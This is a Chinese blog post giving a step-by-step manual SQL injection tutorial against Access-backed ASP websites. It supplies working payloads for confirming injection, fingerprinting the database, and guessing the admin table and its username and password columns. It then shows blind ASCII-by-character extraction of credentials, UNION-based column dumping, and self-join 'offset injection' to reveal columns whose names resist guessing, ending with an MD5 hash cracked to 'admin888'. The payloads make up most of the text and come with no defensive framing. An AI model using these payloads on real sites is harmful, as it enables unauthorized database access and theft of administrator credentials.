access手工注入

【SQL】access手工注入



1)判断注入
‘            出现错误  –可能存在注入漏洞
and 1=1      返回正确
and 1=2      返回错误  –说明存在注入漏洞

 

2)判断数据库
and (select count(*) from msysobjects)>0    –返回权限不足为access数据库
and (select count(*) from sysobjects)>0     –返回正常则为MSSQL数据库

 

3)猜表名列名
and exists (select * from 表名)  –猜测表名
and exists (select 列名 from 表名) –猜测列名
如:
判断是否存在admin的表:and exists (select * from admin)
判断是否存在username的列:and exists (select username from admin)
判断是否存在password的列:and exists (select password from admin)

 

4)猜解用户名和密码长度
and (select top 1 len(列名) from 表名)=X   –X代表数字,返回正确代表所猜的列名长度为这个数字
如:
判断用户名的长度是否大于零:and (select top 1 len(username) from admin)>0
判断用户名的长度是否大于四:and (select top 1 len(username) from admin)>4
判断用户名的长度是否大于五:and (select top 1 len(username) from admin)>5
–用户名一般都是admin,大于四返回正确,当大于五返回出错,那么他的长度就是5,密码一般是MD5加密的,所以一般都为16或32位。

 

5)猜解用户和密码的ascii码     

–这里应该采用截半法来提高效率。ascii码0-126。

 

这里我们假设用户为:admin 密码为:admin888,猜出来的ascii码用转换工具转换下就可以的出明

 


and(select top 1 asc(mid(username,1,1))from admin)>97 
and(select top 1 asc(mid(username,1,1))from admin)=97  
and(select top 1 asc(mid(username,2,1))from admin)=100
and(select top 1 asc(mid(username,3,1))from admin)=109
and(select top 1 asc(mid(username,4,1))from admin)=105
and(select top 1 asc(mid(username,5,1))from admin)=110

 

97 100 109 105 110 admin
———————————————————–
and(select top 1 asc(mid(password,1,1))from admin)=52
and(select top 1 asc(mid(password,2,1))from admin)=54
and(select top 1 asc(mid(password,3,1))from admin)=57
and(select top 1 asc(mid(password,4,1))from admin)=56
and(select top 1 asc(mid(password,5,1))from admin)=48
and(select top 1 asc(mid(password,6,1))from admin)=100
and(select top 1 asc(mid(password,7,1))from admin)=51
and(select top 1 asc(mid(password,8,1))from admin)=50
and(select top 1 asc(mid(password,9,1))from admin)=99
and(select top 1 asc(mid(password,10,1))from admin)=48
and(select top 1 asc(mid(password,11,1))from admin)=53
and(select top 1 asc(mid(password,12,1))from admin)=53
and(select top 1 asc(mid(password,13,1))from admin)=57
and(select top 1 asc(mid(password,14,1))from admin)=102
and(select top 1 asc(mid(password,15,1))from admin)=56
and(select top 1 asc(mid(password,16,1))from admin)=32

 

52 54 57 101 56 48 100 51 50 99 48 53 53 57 102 56 32 
469e80d32c0559f8 md5 解出来的密码是admin888

 

===================分割线===================

 

至此,用户密码都出来,万恶的手工结束。

 

不过是不是有点繁琐,除了工具,还有方便的联合查询方法,继续:

 

1)联合查询:
order by X      –猜字段(X代表数字,返回错误代表数字大,直至反正正确代表有多少字段。)

 

union select 1,2,3,4,5,6….from 表名    有多少字段,数字就写到多少,爆字段位置
union select 1,列名,3,4,5,6 from 表名   爆列名所含的内容,位置在哪里就写在哪里

 

如:
order by 15 错误
order by 16 正确    –说明有16个字段

 

假如表为:admin 列名有:username,password 。 
构造的语句为:
http:url.asp?id=1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin

 

在爆出的字段位置填入列名,这里假如为6,8。
构造的语句为:
http:url.asp?id=1 union select 1,2,3,4,5,username,7,password,9,10,11,12,13,14,15,16 from admin

 

===================分割线===================

 

至此,用户密码同样爆出来了,是不是简单了。

 

有时候联合查询爆出字段位置,死活猜不到列名,各种神器都砸不出来时,这里就要用到偏移注射,

 

顺便说下:

 

说明下,注入表的字段数要大于或等于目标列的两倍。

 

1)首先要构造这样子的语句:select * from (admin as a inner join admin as b on a.id=b.id)

几点说明:
–*代表的字段,如果拓宽会加大username password在可显示位置的几率
–(admin as a inner join admin as b on a.id=b.id)是admin表自连接
–id为列,当id列改变则随之改变
–整句的意思是:admin表记为a,同时也记为b,然后查询条件是a表的id列与b表的id列相等,返回

 

所有相等的行,显然,a,b都是同一个表,当然全部返回啦。

 

还是举例说明好:
http://url.asp?id=1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin

 

假如有五个表列,则
http://url.asp?id=1 union select 1,2,3,4,5,6,* from (admin as a inner join admin as b on a.id=b.id)

 

人品不好还是没爆出来,则
http://url.asp?id=1 union select 1,2,3,4,5,6,a.id,* from (admin as a inner join admin as b on a.id=b.id)

http://url.asp?id=1 union select 1,2,3,4,5,6,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)

这时*里的字段排列顺序却被打乱,增加页面显示几率。

 

如果还没爆出来,则
http://url.asp?id=1 union select 1,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)

http://url.asp?id=1 union select 1,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)

 

【注】本文转自:http://sh4dow.lofter.com/post/395c80_1214862

posted @ 2017-07-05 19:05 0nth3way 阅读(...) 评论(...) 编辑 收藏